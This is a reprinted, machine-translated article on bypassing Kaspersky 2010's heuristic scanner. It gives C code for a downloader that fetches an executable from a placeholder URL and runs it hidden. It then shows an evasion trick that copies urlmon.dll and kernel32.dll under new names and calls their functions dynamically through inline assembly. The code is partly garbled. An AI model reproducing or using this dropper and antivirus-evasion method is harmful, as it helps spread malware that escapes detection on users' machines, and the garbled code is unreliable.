Analysis of Kaspersky heuristic scanning and its bypass scheme

Source: Internet
Author: User

Reprinted from:

Kaspersky 2010 has a powerful heuristic scan, in fact, heuristic scanning has a lot of weaknesses, there is not a complete simulation of the operating environment of the program, which may leave us a space to bypass the heuristic scan, in fact, other anti-virus software heuristic scanning has these spaces, Let's analyze Kaspersky's heuristic scan below!
First of all to make a program to complete the test, the program must be very specific to the heuristic scan this piece, otherwise no effect, select the code to test it? Well, there is a code heuristic scan almost all to scan, that is the code of the downloader, the general download code is as follows:

(To prevent accidental hits, all URLs are set to HXXP, please try to change and then visit)

 int  _tmain (int  argc, _tchar* argv[]) {Urldownloadtofilea (NULL,    , "  Span style= "color: #800000;" >c:\\yan.exe  , 0  ,null); WinExec (  c:\\yan.exe   " ,sw_hide);}  

The above code should be the most familiar, heuristic scan found that call Urldownloadtofilea and winexec is considered a virus, first write a program, put to Kaspersky 2010
So, the cat download virus, it seems that the heuristic scan of the cat has worked, tested, whether changed to dynamic calls or other programs, As long as winexec in Kennel32.dll and UrlMon.dll in the call are not able to escape from Kaspersky's heuristic scan.
The following starts with a heuristic scan of the weaknesses to test, that is not fully simulation of the program running environment, when we create files and other operations, in the context of heuristic scanning is actually no operation, then the method was born, You can copy a copy of the Kernel32.dll Kaba.dll, and then dynamically invoke the WinExec function in KaBa.dll, then the heuristic scan should be obsolete, because in the context of the heuristic scanning is not really a copy of the Kaba.dll file, then our dynamic call is unknown, so Our program is safe. Modify the code as follows:

Char* str="C:\\yan.exe"; Char* Url="Hxxp://www.hehe/yan.exe"; Copyfilea ("C:\\windows\\system32\\urlmon.dll","C:\\windows\\system32\\kabaurl.dll",true); LoadLibrary ("KaBaUrl.dll"); PVOID Dwon=getprocaddress (GetModuleHandle ("KaBaUrl.dll"),"Urldownloadtofilea"); _asm {Push0Push0Push Str push URL push0Call Dwon} Copyfilea ("C:\\windows\\system32\\kernel32.dll","C:\\windows\\system32\\kaba.dll",true); LoadLibrary ("KaBa.dll"); PVOID Fun=getprocaddress (GetModuleHandle ("KaBa.dll"),"winexec"); _asm {push sw_hide push Str Call Fun}

The code generated above the program run, Kabbah will not have any reaction, it seems that heuristic scanning has a great disadvantage, and finally hope that Kaspersky's heuristic scanning more and more perfect, to the anti-virus software heuristic scanning can fully simulate the program running environment, Then the heuristic scan may not be called Heuristic scanning (declaration: The above code is only used for testing purposes, which are used for illegal use, the consequences of self-esteem. )

Analysis of Kaspersky heuristic scanning and its bypass scheme

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.